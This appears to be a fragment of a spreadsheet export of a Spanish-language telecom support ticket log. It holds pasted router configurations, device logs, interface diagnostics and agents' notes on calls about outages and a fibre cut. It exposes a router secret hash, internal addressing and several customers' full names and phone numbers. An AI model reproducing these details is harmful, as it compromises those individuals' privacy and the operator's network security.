CONTROL-PLANE
!
!
PRIVILEGE EXEC LEVEL 3 TRACEROUTE
PRIVILEGE EXEC LEVEL 3 PING IP
PRIVILEGE EXEC LEVEL 3 PING
PRIVILEGE EXEC LEVEL 3 SHOW RUDPV1
PRIVILEGE EXEC LEVEL 3 SHOW STANDBY
PRIVILEGE EXEC LEVEL 3 SHOW STORM-CONTROL
PRIVILEGE EXEC LEVEL 3 SHOW STACKS
PRIVILEGE EXEC LEVEL 3 SHOW STARTUP-CONFIG
PRIVILEGE EXEC LEVEL 3 SHOW RUNNING-CONFIG
PRIVILEGE EXEC LEVEL 3 SHOW CONFIGURATION
PRIVILEGE EXEC LEVEL 3 SHOW
BANNER LOGIN ^C
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
^C
PARSER VIEW AGRICOLA
 SECRET 5 $1$M02S$DZUTJDMOVVYPHU13VFDMV0
 COMMANDS EXEC INCLUDE ALL TELNET
 COMMANDS EXEC INCLUDE ALL WRITE
 COMMANDS EXEC INCLUDE ALL TRACEROUTE
 COMMANDS EXEC INCLUDE ALL PING
 COMMANDS EXEC INCLUDE ALL ENABLE
 COMMANDS EXEC INCLUDE ALL SEND
 COMMANDS EXEC EXCLUDE RELOAD
 COMMANDS EXEC EXCLUDE UNDEBUG IP PACKET
 COMMANDS EXEC INCLUDE UNDEBUG IP
 COMMANDS EXEC EXCLUDE UNDEBUG ALL
 COMMANDS EXEC INCLUDE ALL UNDEBUG
 COMMANDS EXEC EXCLUDE SHOW STARTUP-CONFIG
 COMMANDS EXEC INCLUDE ALL SHOW
 COMMANDS EXEC INCLUDE ALL SET
 COMMANDS EXEC EXCLUDE DEBUG IP PACKET
 COMMANDS EXEC INCLUDE DEBUG IP
 COMMANDS EXEC EXCLUDE DEBUG ALL
 COMMANDS EXEC INCLUDE ALL DEBUG
!
!
LINE CON 0
 AUTHORIZATION EXEC CON_ACC
 LOGIN AUTHENTICATION CON_ACC
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
NTP SERVER 201.247.152.233 PREFER
NTP SERVER 201.247.152.249
!
END
IP2172017#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2626 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 2633 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 08:43:27.644 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.71, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 08:56:33.884 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.74, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 09:17:17.387 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.78, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 09:18:23.383 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.84, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 12:33:49.575 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.112, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 12:47:00.531 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.91, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 15:06:27.126 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.75, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 15:08:45.974 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.77, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 15:09:58.266 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.73, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 15:15:07.978 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.89, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 15:54:45.494 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.70, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 16:03:43.482 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.83, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 16:05:53.254 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.71, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 16:19:04.486 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.74, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 16:39:46.854 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.78, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 16:41:02.630 GMT: %CRYPTO-4-RECVD_PKT_NOT_IPSEC: REC'D PACKET NOT AN IPSEC PACKET. (IP) VRF/DEST_ADDR= /172.19.109.84, SRC_ADDR= 10.8.41.123, PROT= 1
*FEB 18 17:00:54.626 GMT: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY T3LN0CR3D3S ON VTY0 (10.95.61.100)
*FEB 18 17:28:27.905 GMT: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY T3LN0CR3D3S ON VTY0 (10.95.61.100)
*FEB 18 17:28:41.977 GMT: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*FEB 18 17:29:15.305 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK13, CHANGED STATE TO UP
*FEB 18 17:29:35.897 GMT: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*FEB 18 17:29:36.897 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*FEB 18 17:29:50.389 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*FEB 18 17:29:54.281 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*FEB 18 17:29:55.281 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*FEB 18 17:30:38.161 GMT: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY T3LN0CR3D3S ON VTY0 (10.95.61.100)
*FEB 18 17:31:11.841 GMT: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY T3LN0CR3D3S ON VTY0 (10.95.61.100)
*FEB 18 17:38:49.281 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*FEB 18 17:38:50.281 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*FEB 18 17:39:13.281 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*FEB 18 17:39:14.281 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
IP2172017#
SHOW CLOCK
*03:32:27.259 GMT FRI MAY 13 2022
IP2172017#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.55.40.137            -   00A3.8EE4.1C81  ARPA   GIGABITETHERNET0/1
INTERNET  10.55.40.138           43   AC4A.67CC.F064  ARPA   GIGABITETHERNET0/1
INTERNET  10.138.83.41           16   084F.0AC8.6ACB  ARPA   GIGABITETHERNET0/0
INTERNET  10.138.83.42            -   00A3.8EE4.1C80  ARPA   GIGABITETHERNET0/0
IP2172017#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/IP2172017SV/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
GI0/1.1                        DELETED        DOWN
GI0/1.256                      DELETED        DOWN
GI0/1.456                      DELETED        DOWN
GI0/1.556                      DELETED        DOWN
GI0/1.557                      DELETED        DOWN
GI0/1.558                      DELETED        DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
LO13                           UP             UP       MONITOREO-BA-GBM
IP2172017#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.138.83.42    YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.55.40.137    YES MANUAL UP                    UP
GIGABITETHERNET0/1.1       UNASSIGNED      YES MANUAL DELETED               DOWN
GIGABITETHERNET0/1.256     UNASSIGNED      YES MANUAL DELETED               DOWN
GIGABITETHERNET0/1.456     UNASSIGNED      YES MANUAL DELETED               DOWN
GIGABITETHERNET0/1.556     UNASSIGNED      YES MANUAL DELETED               DOWN
GIGABITETHERNET0/1.557     UNASSIGNED      YES MANUAL DELETED               DOWN
GIGABITETHERNET0/1.558     UNASSIGNED      YES MANUAL DELETED               DOWN
LOOPBACK5                  10.166.0.125    YES NVRAM  UP                    UP
LOOPBACK13                 10.55.42.88     YES MANUAL UP                    UP
IP2172017#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BA_VPN 10.138.83.42
  PING 10.138.83.42: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.138.83.42 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.30.103
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BA_VPN 10.138.83.42
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BA_VPN
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.138.83.42/32  DIRECT  0    0                 0.0.0.0         VLANIF1271			</t>
  </si>
  <si>
    <t>F4560968</t>
  </si>
  <si>
    <t>SE TRASLADA A PERSONAL DE REAPARACION FO SE LLAMARA EN 45 MINUTOS MAS</t>
  </si>
  <si>
    <t>JOSE ANTONIO FERNANDEZ CABRERA
JUE 12/05/2022 12:10
ESTIMADO CLIENTE, POR MEDIO DEL PRESENTE LE NOTIFICAMOS QUE SU SERVICIO 14600021T ESTÁ SIENDO ATENDIDO POR PERSONAL DE CAMPO PARA REALIZAR LA REPARACIÓN DE FIBRA ÓPTICA YA QUE SE TIENE UN CORTE A 2600 METROS DE SUS INSTALACIONES, PERSONAL DE CAMPO INDICAN QUE APROXIMADAMENTE FINALIZARAN EN 1 HORA POR LO QUE PEDIMOS DE SU COMPRENSIÓN EN LO QUE SE RESTABLECE EL ENLACE.
QUEDAMOS ATENTOS ANTE CUALQUIER CONSULTA POR SU PARTE.
SALUDOS
JOSE ANTONIO FERNANDEZ CABRERA</t>
  </si>
  <si>
    <t>POSIBLE CORTE DE FIBRA SE ENVIARA A CABLES
ADMINISTRATIVE STATUS : UP
OPERATIONAL STATUS    : DOWN
CONNECTOR TYPE        : SFP IN
AUTO NEGOTIATION      : DISABLED
MAC ADDRESS           : 00-20-D2-57-95-88
SFP
-----------------------------------------------------------------------------
CONNECTOR TYPE                : LC
MANUFACTURER NAME             : RAD DATA COMM.
MANUFACTURER PART NUMBER      : SFP-10AD
TYPICAL MAXIMUM RANGE (METER) : 20000
WAVE LENGTH (NM)              : 1310 LASER
FIBER TYPE                    : SM
RX POWER (DBM)              : -40.0 DBM
TX POWER (DBM)              : -12.7 DBM
MORE..
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;YGUAGTGUN1D1C00A03EIM1&gt;
INFO: THE MAX NUMBER OF VTY USERS IS 15, AND THE NUMBER OF CURRENT VTY USERS ON LINE IS 4.
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
SESSION STOPPED
    - PRESS &lt;RETURN&gt; TO EXIT TAB
    - PRESS R TO RESTART SESSION
    - PRESS S TO SAVE TERMINAL OUTPUT TO FILE</t>
  </si>
  <si>
    <t>SE LLAMA A TECNICO 2683 METROS CORTE</t>
  </si>
  <si>
    <t>F4560990</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JOSE PEREZ 78471779 NO SE LOGRO COMUNICACION IVR ENVIA A BUZON, ID: 1001926483.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE PEREZ 78471779 INDICA QUE AUN ESTA INTERMITENTE EL SERVICIO || SE NOTIFICA A GESTOR **
ID 2001072890
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE PEREZ 78471779  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001059236</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE PEREZ 78471779 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001009908</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JOSE PEREZ 78601531 NO CONTESTO IVR ENVIA A BUZON
EFECTIVAMENTE SE OBSERVA CAIDA EN EL ENLACE SE APLICO CAMBIO DE NEGOCIACION EN EL PUERTO DE ACCESO:
&lt;AAPASVZTN1D1EID1&gt;PING -C 3000 -S 1400 -M 30 -B -VPN DESCO 10.152.194.146
  PING 10.152.194.146: 1400  DATA BYTES, PRESS CTRL_C TO BREAK
    .........................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.152.194.146 PING STATISTICS ---
    3000 PACKET(S) TRANSMITTED
    2975 PACKET(S) RECEIVED
    0.83% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 5/7/328 MS
&lt;OJUASVZDN1R1ENM1&gt;DISP INT GI0/2/31
GIGABITETHERNET0/2/31 CURRENT STATE : UP (IFINDEX: 36)
LINE PROTOCOL CURRENT STATE : UP
LINK QUALITY GRADE : GOOD
DESCRIPTION: MP240818001S/OJUASVZDN1R1ENM1/TEFEX
SWITCH PORT, TPID : 8100(HEX), THE MAXIMUM TRANSMIT UNIT(L3) IS 1500 BYTES, THE MAXIMUM RECEIVE UNIT(L2) IS 9700 BYTES
INTERNET PROTOCOL PROCESSING : DISABLED
IP SENDING FRAMES' FORMAT IS PKTFMT_ETHNT_2, HARDWARE ADDRESS IS 38EB-47BE-9518
MEDIA TYPE: TWISTED-PAIR ,LINK TYPE: AUTO NEGOTIATION
LOOPBACK:NONE, MAXIMAL BW:1G, CURRENT BW:100M, HALF-DUPLEX MODE, NEGOTIATION: ENABLE, PAUSE FLOWCONTROL:RECEIVE ENABLE AND SEND DISABLE
LAST PHYSICAL UP TIME   : 2022-05-12 09:52:38-06:00
LAST PHYSICAL DOWN TIME : 2022-05-12 09:52:33-06:00
CURRENT SYSTEM TIME: 2022-05-12 09:56:31-06:00
STATISTICS LAST CLEARED:NEVER
    LAST 300 SECONDS INPUT RATE: 597449 BITS/SEC, 89 PACKETS/SEC
    LAST 300 SECONDS OUTPUT RATE: 492658 BITS/SEC, 81 PACKETS/SEC
    INPUT PEAK RATE 9504721 BITS/SEC, RECORD TIME: 2022-01-25 17:37:13-06:00
    OUTPUT PEAK RATE 97311680 BITS/SEC, RECORD TIME: 2022-03-18 01:43:36-06:00
    INPUT: 112087773311 BYTES, 390972505 PACKETS
    OUTPUT: 398319515027 BYTES, 564671662 PACKETS
    INPUT:
      UNICAST: 390967947 PACKETS, MULTICAST: 266 PACKETS
      BROADCAST: 4292 PACKETS, JUMBOOCTETS: 41844565 PACKETS
      CRC: 84 PACKETS, SYMBOL: 2 PACKETS
      OVERRUN: 0 PACKETS, INRANGELENGTH: 0 PACKETS
      LONGPACKET: 0 PACKETS, JABBER: 0 PACKETS, ALIGNMENT: 2 PACKETS
      FRAGMENT: 144 PACKETS, UNDERSIZED FRAME: 0 PACKETS
      RXPAUSE: 0 PACKETS
    OUTPUT:
      UNICAST: 494564769 PACKETS, MULTICAST: 6433698 PACKETS
      BROADCAST: 63673195 PACKETS, JUMBOOCTETS: 169804842 PACKETS
      LOST: 0 PACKETS, OVERFLOW: 0 PACKETS, UNDERRUN: 0 PACKETS
      SYSTEM: 0 PACKETS, OVERRUNS: 0 PACKETS
      TXPAUSE: 0 PACKETS
    LAST 300 SECONDS INPUT UTILITY RATE:  0.59%
    LAST 300 SECONDS OUTPUT UTILITY RATE: 0.49%
[~OJUASVZDN1R1ENM1]INT GI0/2/31
[~OJUASVZDN1R1ENM1-GIGABITETHERNET0/2/31]NE
[~OJUASVZDN1R1ENM1-GIGABITETHERNET0/2/31]NEGOTIATION A
[~OJUASVZDN1R1ENM1-GIGABITETHERNET0/2/31]NEGOTIATION AUTO
[*OJUASVZDN1R1ENM1-GIGABITETHERNET0/2/31]COMIIT</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. JOSE PEREZ 78471779 INIDCA QUE NO ESTA EN SITIO QUE SE LLAME AL SEÑOR ENRIQUE ESPERANZA AL 78601531 **
ID 100946832
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR ENRIQUE ESPERANZA AL 78601531 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 1001947749
**</t>
  </si>
  <si>
    <t>F4561012</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAUL ESCOBAR 59665629 MENCIONA QUE EL INCONVENIENTE ES DE LA PLANTA TELEFONICA POR LO QUE LO ESTARA ESCALANDO CON EL PROVEEDOR, CLIENTE AUTORIZA CIERRE DE TICKET
-ID 1001959554</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 59665629 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 1001933986
**</t>
  </si>
  <si>
    <t>F4561016</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001933844 - 1001935744</t>
  </si>
  <si>
    <t>F4561027</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SERGIO BALTODANO 89884602 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001773167</t>
  </si>
  <si>
    <t>SE LLAMA A CONTACTO DE CLIENTE QUIEN REPORTA 89884602 SERGIO BALTODANO SE LE COMENTA LO REALIZADO, CLIENTE INDICA QUE NO SE ENCUENTRA EN OFICINA PERO QUE EN 30 MINUTOS SE LE LLAME PARA VALIDAR, ADICIONAL SE LE INDICA QUE NO HAY ERRORES CRC EN INTERFAZ
2001063369
COLA:
NOMBRE: A: 50589884602
NÚMERO: 50589884602
DURACIÓN: 0:02:34
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50589884602
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 12/05/2022 15:16:40</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE   SERGIO BALTODANO 89884602 MENCIONA QUE VA MANEJANDO POR LO QUE SOLICITA LLAMADA EN 30 MIN
-ID 2001773665</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO BALTODANO 89884602 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001183244 - 2001183732</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO BALTODANO 8988-4602 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001306521 - 2001306718</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SERGIO BALTODANO 89884602 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001781689</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO BALTODANO AL 8988-4602 SE LLAMA A CLIENTE NO, ENVIA A BUZON RESPONDE SE INTENTARA LUEGO **
ID 2001769728
**</t>
  </si>
  <si>
    <t>F4561030</t>
  </si>
  <si>
    <t>CILNTE VLAIDA SERVICIO-SE PROCEDE AL CIERRE ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CIETE JULIO CIFUENTES-56958241</t>
  </si>
  <si>
    <t>REALIZA PRUEBAS DE LLAMADAS ENN ESTE MOMENTO</t>
  </si>
  <si>
    <t>SE TIENEN EN LINEA- YHA UBICADO EQUIPOS- SE PASAS A ETAPA ANTERIOR</t>
  </si>
  <si>
    <t>F4561031</t>
  </si>
  <si>
    <t>CLIENTE RODRIGO GONZALEZ 47696800, REALIZA PRUEBAS Y VALIDA EL E1 ACTIVO, AUTORIZA EL CIERRE DEL CASO.</t>
  </si>
  <si>
    <t>F4561036</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BARTINEO REYES 59925063 MENCIONA QUE NO TIENE ENERGIA EN PR
